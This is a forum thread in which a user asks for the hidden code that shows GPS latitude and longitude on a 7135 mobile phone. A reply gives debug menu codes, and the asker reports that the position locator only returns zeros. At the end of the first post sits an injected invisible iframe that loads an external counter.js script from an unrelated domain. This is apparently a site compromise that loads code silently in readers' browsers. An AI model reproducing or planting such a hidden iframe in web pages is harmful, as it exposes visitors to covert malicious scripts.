+ Reply to Thread

Question GPS location - anyone know how to get it?

Hi all, thanks again for the help on past issues.

My neighbor was instrumental in merging GPS hardware/software into mobile phones (motorola in particular). He told me that there is a code which can be entered into most phones that will display its current Latitude/Longitude from the GPS receiver inside.

Does anyone know what this code is for the 7135 and can you tell us? If not, can anyone enlighten me as to why this "feature" is not accessible by the phone's owner. According to my friend, there are numerous "privacy" issues involved with adding the functionality of private parties tracking the location of a particular phone (use your imagination) but, why wouldn't it be OK for the person holding the phone to find out his coordinates?

Thanks,
    Joe

BTW, in my area (Silicon Valley) the emergency services agencies have NOT yet adopted the ability to get a location from a GPS enabled phone. What it really means is they have not spent the money to procure whatever hardware/software/training is necessary. Kind of a sad way to lead the worlds technology revolution.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

entering 111111 will enable options under the phone menu. Then select Debug and on my phone I use the default code of 000000. then select position locator.

Thanks, that helped

The tips to get into the programming mode helped, but still no location. Once in it the Position Location Preferences screen, the phone shows:

A check mark in the Use Local Server, the RF Path is set to "Radiated" vs. Conducted - the other option. And, the server address is set to 000000000000, server port 0, timeout 0, performance 0, call quality 0 and measurements 0.

My guess is that all these zeds mean the phone has no-one to talk to to get a location. It also suggests the 7135 may not actually have a fully functional GPS receiver built in. Is it instead, designed to get its location from the nearest cell site?

Anyway, all this results in is a Longitude reading of 0, Latitude of 0, Altitude of 0, Direction of 0 Vertical speed of 0 and time of 0.

Any hints on how to actually turn this thing on would be GREAT!
    Thanks,
    Joe